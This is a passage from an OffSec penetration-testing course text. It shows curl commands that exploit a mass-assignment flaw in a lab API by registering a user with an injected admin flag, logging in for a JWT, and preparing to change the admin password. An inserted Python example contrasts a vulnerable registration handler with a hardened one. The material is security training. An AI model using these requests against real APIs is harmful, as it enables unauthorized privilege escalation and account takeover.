Penetration Testing with Kali Linux OffSec


Date: 21.12.2023
PEN-200

curl -d '{"password":"lab","username":"offsecadmin"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/register
{ "status": "fail", "message": "'email' is a required property"}
Listing 113 - Attempting new User Registration 
The API replied with a fail message stating that we should also include an email address. We could take this opportunity to determine if there’s any administrative key we can abuse. Let’s add the admin key, followed by a True value.
kali@kali:~$ curl -d '{"password":"lab","username":"offsec","email":"pwn@offsec.com","admin":"True"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/register
{"message": "Successfully registered. Login to receive an auth token.", "status": "success"}
Listing 114 - Attempting to register a new user as admin 
Since we received no error, it seems we were able to successfully register a new user as an 
admin, which should not be permitted by design. Next, let’s try to log in with the credentials we 
just created by invoking the login API we discovered earlier. 
kali@kali:~$ curl -d '{"password":"lab","username":"offsec"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/login
{"auth_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzEyMDEsImlhdCI6MTY0OTI3MDkwMSwic3ViIjoib2Zmc2VjIn0.MYbSaiBkYpUGOTH-tw6ltzW0jNABCDACR3_FdYLRkew", "message": "Successfully logged in.", "status": "success"}
Listing 115 - Logging in as an admin user 
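
The registration behaviour seen in Listing 114, viewed from the server side, as an added example that is not part of the course text or the lab API's real code: a hypothetical handler that copies every JSON key onto the user record, beside one that allowlists fields and sets the admin flag only server-side. The function names, the in-memory db dictionary and the hardened handler's error wording are assumptions.

```python
import hashlib
import os
import re

ALLOWED = {"username", "password", "email"}  # the only client-settable fields
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def register_vulnerable(body, db):
    """Copies every client-supplied key onto the record (mass assignment)."""
    for key in ("username", "password", "email"):
        if key not in body:
            return {"status": "fail", "message": f"'{key}' is a required property"}
    user = {"admin": False}
    user.update(body)  # a client-supplied "admin" key overwrites the default
    db[user["username"]] = user
    return {"status": "success"}


def _fail(message):
    return {"status": "fail", "message": message}


def register_hardened(body, db):
    """Allowlists input fields; the privilege flag is only ever set server-side."""
    if not isinstance(body, dict):
        return _fail("request body must be a JSON object")
    unknown = sorted(set(body) - ALLOWED)
    if unknown:
        return _fail(f"unexpected property: {unknown[0]!r}")
    for field in sorted(ALLOWED):
        if not isinstance(body.get(field), str) or not body[field]:
            return _fail(f"{field!r} is a required string property")
    if not EMAIL_RE.match(body["email"]):
        return _fail("'email' is not a valid address")
    if body["username"] in db:
        return _fail("username already registered")
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", body["password"].encode(), salt, 600_000)
    db[body["username"]] = {"username": body["username"], "email": body["email"],
                            "salt": salt, "password_hash": digest, "admin": False}
    return {"status": "success"}


# Constructed request body, mirroring the one sent in Listing 114.
SAMPLE = {"password": "lab", "username": "offsec",
          "email": "pwn@offsec.com", "admin": "True"}
```

Rejecting unknown properties outright, rather than silently dropping them, also gives the API owner a log-worthy signal that a client is probing for privileged fields.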
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved. 
We were able to correctly sign in and retrieve a JWT authentication token. To obtain tangible proof that we are an administrative user, we should use this token to change the admin user password.
We can attempt this by forging a POST request that targets the password API.
kali@kali:~$ 
